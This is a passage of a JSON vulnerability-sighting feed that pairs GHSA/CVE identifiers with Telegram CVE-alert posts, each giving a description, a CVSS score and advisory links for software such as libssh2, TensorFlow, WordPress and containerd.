References:\n1. https://www.libssh2.org/CVE-2019-3856.html\n2. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3856\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:49.000000Z"}, {"uuid": "7eba415e-a559-4d1f-8d73-29092a1717b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1791", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13137", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3856\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw, which could lead to an out of bounds write, was discovered in libssh2 before 1.8.1 in the way keyboard prompt requests are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:31:03.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:00.365Z\n\ud83d\udd17 References:\n1. https://www.libssh2.org/CVE-2019-3856.html\n2. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3856\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:49.000000Z"}, {"uuid": "801810cd-fbf6-421f-8d1e-2124e32e0510", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5J4H-4F72-QPM6", "type": "seen", "source": "Telegram/hVIsWvvgLiiM_GtF82joYNFY3TrnJxWWlKsVG9afGpT3z9w", "content": "", "creation_timestamp": "2026-01-03T14:32:26.000000Z"}, {"uuid": "26d247c5-36f6-46a3-9285-ef209181c1cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8274-H5JP-97VR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13102", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31109\n\ud83d\udd25 CVSS Score: 7.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: laminas-diactoros is a PHP package containing implementations of the PSR-7 HTTP message interfaces and PSR-17 HTTP message factory interfaces. Applications that use Diactoros, and are either not behind a proxy, or can be accessed via untrusted proxies, can potentially have the host, protocol, and/or port of a `Laminas\\Diactoros\\Uri` instance associated with the incoming server request modified to reflect values from `X-Forwarded-*` headers. Such changes can potentially lead to XSS attacks (if a fully-qualified URL is used in links) and/or URL poisoning. Since the `X-Forwarded-*` headers do have valid use cases, particularly in clustered environments using a load balancer, the library offers mitigation measures only in the v2 releases, as doing otherwise would break these use cases immediately. Users of v2 releases from 2.11.1 can provide an additional argument to `Laminas\\Diactoros\\ServerRequestFactory::fromGlobals()` in the form of a `Laminas\\Diactoros\\RequestFilter\\RequestFilterInterface` instance, including the shipped `Laminas\\Diactoros\\RequestFilter\\NoOpRequestFilter` implementation which ignores the `X-Forwarded-*` headers. Starting in version 3.0, the library will reverse behavior to use the `NoOpRequestFilter` by default, and require users to opt-in to `X-Forwarded-*` header usage via a configured `Laminas\\Diactoros\\RequestFilter\\LegacyXForwardedHeaderFilter` instance. Users are advised to upgrade to version 2.11.1 or later to resolve this issue. Users unable to upgrade may configure web servers to reject `X-Forwarded-*` headers at the web server level.\n\ud83d\udccf Published: 2022-08-01T16:15:14.000Z\n\ud83d\udccf Modified: 2025-04-23T17:57:06.264Z\n\ud83d\udd17 References:\n1. https://portswigger.net/web-security/host-header\n2. https://github.com/laminas/laminas-diactoros/security/advisories/GHSA-8274-h5jp-97vr\n3. https://github.com/laminas/laminas-diactoros/commit/25b11d422c2e5dad868f68619888763b30f91e2d", "creation_timestamp": "2025-04-23T18:05:41.000000Z"}, {"uuid": "e76ebbe4-dc15-465f-b089-9d758ea6113a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5866-HHQ9-9HPC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13105", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31154\n\ud83d\udd25 CVSS Score: 6.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L)\n\ud83d\udd39 Description: Sourcegraph is an opensource code search and navigation engine. It is possible for an authenticated Sourcegraph user to edit the Code Monitors owned by any other Sourcegraph user. This includes being able to edit both the trigger and the action of the monitor in question. An attacker is not able to read contents of existing code monitors, only override the data. The issue is fixed in Sourcegraph 3.42. There are no workaround for the issue and patching is highly recommended.\n\ud83d\udccf Published: 2022-08-01T18:40:10.000Z\n\ud83d\udccf Modified: 2025-04-23T17:56:47.681Z\n\ud83d\udd17 References:\n1. https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-5866-hhq9-9hpc\n2. https://github.com/sourcegraph/sourcegraph/pull/37526", "creation_timestamp": "2025-04-23T18:05:47.000000Z"}, {"uuid": "7a46d86b-46dc-4862-b15f-23eb5b3e0887", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QH9X-GCFH-PCRW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13099", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31170\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: OpenZeppelin Contracts is a library for smart contract development. Versions 4.0.0 until 4.7.1 are vulnerable to ERC165Checker reverting instead of returning `false`. `ERC165Checker.supportsInterface` is designed to always successfully return a boolean, and under no circumstance revert. However, an incorrect assumption about Solidity 0.8's `abi.decode` allows some cases to revert, given a target contract that doesn't implement EIP-165 as expected, specifically if it returns a value other than 0 or 1. The contracts that may be affected are those that use `ERC165Checker` to check for support for an interface and then handle the lack of support in a way other than reverting. The issue was patched in version 4.7.1.\n\ud83d\udccf Published: 2022-07-21T14:00:18.000Z\n\ud83d\udccf Modified: 2025-04-23T17:57:25.929Z\n\ud83d\udd17 References:\n1. https://github.com/OpenZeppelin/openzeppelin-contracts/pull/3552\n2. https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-qh9x-gcfh-pcrw", "creation_timestamp": "2025-04-23T18:05:38.000000Z"}, {"uuid": "3ed0029c-cbf2-44d0-a5b6-eef69152cb81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G63-C64M-25W9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31172\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: OpenZeppelin Contracts is a library for smart contract development. Versions 4.1.0 until 4.7.1 are vulnerable to the SignatureChecker reverting. `SignatureChecker.isValidSignatureNow` is not expected to revert. However, an incorrect assumption about Solidity 0.8's `abi.decode` allows some cases to revert, given a target contract that doesn't implement EIP-1271 as expected. The contracts that may be affected are those that use `SignatureChecker` to check the validity of a signature and handle invalid signatures in a way other than reverting. The issue was patched in version 4.7.1.\n\ud83d\udccf Published: 2022-07-21T13:55:11.000Z\n\ud83d\udccf Modified: 2025-04-23T17:57:33.239Z\n\ud83d\udd17 References:\n1. https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-4g63-c64m-25w9\n2. https://github.com/OpenZeppelin/openzeppelin-contracts/pull/3552", "creation_timestamp": "2025-04-23T18:05:38.000000Z"}, {"uuid": "9b22718b-ef18-488d-879a-0da586effc37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2P49-VGCX-5W79", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13103", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31128\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Tuleap is a Free &amp; Open Source Suite to improve management of software developments and collaboration. In affected versions Tuleap does not properly verify permissions when creating branches with the REST API in Git repositories using the fine grained permissions. Users can create branches via the REST endpoint `POST git/:id/branches` regardless of the permissions set on the repository. This issue has been fixed in version 13.10.99.82 Tuleap Community Edition as well as in version 13.10-3 of Tuleap Enterprise Edition. Users are advised to upgrade. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-08-01T16:20:13.000Z\n\ud83d\udccf Modified: 2025-04-23T17:56:59.891Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-2p49-vgcx-5w79\n2. https://github.com/Enalean/tuleap/commit/58ecb1dee1c46075d3e089980301ebfbe0bafd33\n3. https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&amp;h=58ecb1dee1c46075d3e089980301ebfbe0bafd33\n4. https://tuleap.net/plugins/tracker/?aid=27538", "creation_timestamp": "2025-04-23T18:05:42.000000Z"}, {"uuid": "b65796c7-ad6c-40d5-9c3c-7348042b32a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MFQJ-F22M-GV8J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13112", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-41111\n\ud83d\udd25 CVSS Score: 6.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: Rundeck is an open source automation service with a web console, command line tools and a WebAPI. Prior to versions 3.4.5 and 3.3.15, an authenticated user with authorization to read webhooks in one project can craft a request to reveal Webhook definitions and tokens in another project. The user could use the revealed webhook tokens to trigger webhooks. Severity depends on trust level of authenticated users and whether any webhooks exist that trigger sensitive actions. There are patches for this vulnerability in versions 3.4.5 and 3.3.15. There are currently no known workarounds.\n\ud83d\udccf Published: 2022-02-28T19:15:11.000Z\n\ud83d\udccf Modified: 2025-04-23T19:00:01.628Z\n\ud83d\udd17 References:\n1. https://github.com/rundeck/rundeck/security/advisories/GHSA-mfqj-f22m-gv8j\n2. https://github.com/rundeck/rundeck/commit/a3bdc06a0731da902593732022a5b9d2b4facec5", "creation_timestamp": "2025-04-23T19:05:05.000000Z"}, {"uuid": "9e37c187-b853-4001-ba26-5423ef1624b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HRG5-737C-2P56", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12932", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29197\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.UnsortedSegmentJoin` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code assumes `num_segments` is a scalar but there is no validation for this before accessing its value. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.\n\ud83d\udccf Published: 2022-05-20T21:55:18.000Z\n\ud83d\udccf Modified: 2025-04-22T17:59:07.613Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\n2. https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\n3. https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\n4. https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\n5. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hrg5-737c-2p56\n6. https://github.com/tensorflow/tensorflow/commit/13d38a07ce9143e044aa737cfd7bb759d0e9b400\n7. https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/unsorted_segment_join_op.cc#L92-L95", "creation_timestamp": "2025-04-22T18:03:51.000000Z"}, {"uuid": "fb7eaafd-a13c-419a-b2b2-6b45920dc89a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5V77-J66X-4C4G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12931", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-29196\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.Conv3DBackpropFilterV2` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code does not validate that the `filter_sizes` argument is a vector. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.\n\ud83d\udccf Published: 2022-05-20T21:55:12.000Z\n\ud83d\udccf Modified: 2025-04-22T17:59:18.399Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/releases/tag/v2.6.4\n2. https://github.com/tensorflow/tensorflow/releases/tag/v2.7.2\n3. https://github.com/tensorflow/tensorflow/releases/tag/v2.8.1\n4. https://github.com/tensorflow/tensorflow/releases/tag/v2.9.0\n5. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5v77-j66x-4c4g\n6. https://github.com/tensorflow/tensorflow/commit/174c5096f303d5be7ed2ca2662b08371bff4ab88\n7. https://github.com/tensorflow/tensorflow/blob/f3b9bf4c3c0597563b289c0512e98d4ce81f886e/tensorflow/core/kernels/conv_grad_ops_3d.cc", "creation_timestamp": "2025-04-22T18:03:50.000000Z"}, {"uuid": "b57ef03d-df6e-41b7-804b-7e02848ed2fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3GV-CWWH-758M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12938", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32959\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: CUBA Platform is a high level framework for enterprise applications development. Prior to version 7.2.23, the local file storage implementation does not restrict the size of uploaded files. An attacker could exploit this by uploading excessively large files, potentially causing the server to run out of space and return HTTP 500 error, resulting in a denial of service. This issue has been patched in version 7.2.23. A workaround is provided on the Jmix documentation website.\n\ud83d\udccf Published: 2025-04-22T17:45:00.340Z\n\ud83d\udccf Modified: 2025-04-22T18:50:33.199Z\n\ud83d\udd17 References:\n1. https://github.com/cuba-platform/cuba/security/advisories/GHSA-w3mp-6vrj-875g\n2. https://github.com/jmix-framework/jmix/security/advisories/GHSA-f3gv-cwwh-758m\n3. https://github.com/cuba-platform/cuba/commit/42b6c00fd0572b8e52ae31afd1babc827a3161a1\n4. https://docs.jmix.io/jmix/files-vulnerabilities.html\n5. https://docs.jmix.io/jmix/files-vulnerabilities.html#disable-files-endpoint-in-cuba-application", "creation_timestamp": "2025-04-22T19:03:28.000000Z"}, {"uuid": "d594a36a-cf43-4efe-bea1-1ec21b362579", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6VFC-QV3F-VR6C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12952", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-21670\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: markdown-it is a Markdown parser. Prior to version 1.3.2, special patterns with length greater than 50 thousand characterss could slow down the parser significantly. Users should upgrade to version 12.3.2 to receive a patch. There are no known workarounds aside from upgrading.\n\ud83d\udccf Published: 2022-01-10T20:40:10.000Z\n\ud83d\udccf Modified: 2025-04-22T18:33:46.200Z\n\ud83d\udd17 References:\n1. https://github.com/markdown-it/markdown-it/security/advisories/GHSA-6vfc-qv3f-vr6c\n2. https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101", "creation_timestamp": "2025-04-22T19:03:48.000000Z"}, {"uuid": "8535a4bc-c130-43aa-a729-5a4f6689bbf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JMMQ-M8P8-332H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12951", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-21663\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: WordPress is a free and open-source content management system written in PHP and paired with a MariaDB database. On a multisite, users with Super Admin role can bypass explicit/additional hardening under certain conditions through object injection. This has been patched in WordPress version 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-01-06T23:00:11.000Z\n\ud83d\udccf Modified: 2025-04-22T18:33:55.718Z\n\ud83d\udd17 References:\n1. https://wordpress.org/news/2022/01/wordpress-5-8-3-security-release/\n2. https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h\n3. https://www.debian.org/security/2022/dsa-5039\n4. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DM6XPH3JN6V4NF4WBOJTOXZIVE6VKKE3/\n5. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CV4UNEC63UU5GEU47IIR4RMTZAHNEOJG/\n6. https://lists.debian.org/debian-lts-announce/2022/01/msg00019.html\n7. https://blog.sonarsource.com/wordpress-object-injection-vulnerability/", "creation_timestamp": "2025-04-22T19:03:47.000000Z"}, {"uuid": "5500c4c1-dff1-4db2-95b7-64b454538716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MVFF-H3CJ-WJ9C", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12948", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-43816\n\ud83d\udd25 CVSS Score: 8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: containerd is an open source container runtime. On installations using SELinux, such as EL8 (CentOS, RHEL), Fedora, or SUSE MicroOS, with containerd since v1.5.0-beta.0 as the backing container runtime interface (CRI), an unprivileged pod scheduled to the node may bind mount, via hostPath volume, any privileged, regular file on disk for complete read/write access (sans delete). Such is achieved by placing the in-container location of the hostPath volume mount at either `/etc/hosts`, `/etc/hostname`, or `/etc/resolv.conf`. These locations are being relabeled indiscriminately to match the container process-label which effectively elevates permissions for savvy containers that would not normally be able to access privileged host files. This issue has been resolved in version 1.5.9. Users are advised to upgrade as soon as possible.\n\ud83d\udccf Published: 2022-01-05T18:55:10.000Z\n\ud83d\udccf Modified: 2025-04-22T18:34:15.666Z\n\ud83d\udd17 References:\n1. https://github.com/containerd/containerd/security/advisories/GHSA-mvff-h3cj-wj9c\n2. https://github.com/containerd/containerd/issues/6194\n3. https://github.com/containerd/containerd/commit/a731039238c62be081eb8c31525b988415745eea\n4. https://github.com/dweomer/containerd/commit/f7f08f0e34fb97392b0d382e58916d6865100299\n5. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GD5GH7NMK5VJMA2Y5CYB5O5GTPYMWMLX/\n6. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MPDIZMI7ZPERSZE2XO265UCK5IWM7CID/", "creation_timestamp": "2025-04-22T19:03:44.000000Z"}, {"uuid": "11ac65f8-191c-4ea9-b604-d0973fb43685", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RRRM-QJM4-V8HF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12953", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-21680\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Marked is a markdown parser and compiler. Prior to version 4.0.10, the regular expression `block.def` may cause catastrophic backtracking against some strings and lead to a regular expression denial of service (ReDoS). Anyone who runs untrusted markdown through a vulnerable version of marked and does not use a worker with a time limit may be affected. This issue is patched in version 4.0.10. As a workaround, avoid running untrusted markdown through marked or run marked on a worker thread and set a reasonable time limit to prevent draining resources.\n\ud83d\udccf Published: 2022-01-14T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-22T18:33:37.402Z\n\ud83d\udd17 References:\n1. https://github.com/markedjs/marked/security/advisories/GHSA-rrrm-qjm4-v8hf\n2. https://github.com/markedjs/marked/commit/c4a3ccd344b6929afa8a1d50ac54a721e57012c0\n3. https://github.com/markedjs/marked/releases/tag/v4.0.10\n4. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AIXDMC3CSHYW3YWVSQOXAWLUYQHAO5UX/", "creation_timestamp": "2025-04-22T19:03:49.000000Z"}, {"uuid": "71af85dd-7d5a-4b08-84e9-ddab0ab347e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-35PP-GGH6-C59C", "type": "published-proof-of-concept", "source": "Telegram/76XS8g8vzfJZzLh_Ic6cIEumxaOFppJoCx-jsKbwFQGseRQ", "content": "", "creation_timestamp": "2026-01-02T21:51:37.000000Z"}, {"uuid": "13026b80-deca-4520-8e6c-6963505a8550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W8W8-82PV-5RG9", "type": "published-proof-of-concept", "source": "Telegram/76XS8g8vzfJZzLh_Ic6cIEumxaOFppJoCx-jsKbwFQGseRQ", "content": "", "creation_timestamp": "2026-01-02T21:51:37.000000Z"}, {"uuid": "31472cfd-8445-4e5c-afb5-b8f770d96c7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQM7-M5Q7-3HM5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13075", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36001\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `DrawBoundingBoxes` receives an input `boxes` that is not of dtype `float`, it gives a `CHECK` fail that can trigger a denial of service attack. We have patched the issue in GitHub commit da0d65cdc1270038e72157ba35bf74b85d9bda11. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:10:10.000Z\n\ud83d\udccf Modified: 2025-04-23T17:01:05.199Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-jqm7-m5q7-3hm5\n2. https://github.com/tensorflow/tensorflow/commit/da0d65cdc1270038e72157ba35bf74b85d9bda11", "creation_timestamp": "2025-04-23T17:04:44.000000Z"}, {"uuid": "489d13fe-7b20-444c-a24d-ef11e8e35d33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93MV-X874-956G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13169", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46417\n\ud83d\udd25 CVSS Score: 6.8 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_certificate can exfiltrate data via DNS after deserialization.\n\ud83d\udccf Published: 2025-04-24T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-24T00:27:33.032Z\n\ud83d\udd17 References:\n1. https://github.com/advisories/GHSA-93mv-x874-956g\n2. https://github.com/mmaitre314/picklescan/pull/40", "creation_timestamp": "2025-04-24T01:04:58.000000Z"}, {"uuid": "c058d27e-48e2-42a9-8093-68d1c688fa7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63QQ-HW97-8Q7X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13108", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31178\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: eLabFTW is an electronic lab notebook manager for research teams. A vulnerability was discovered which allows a logged 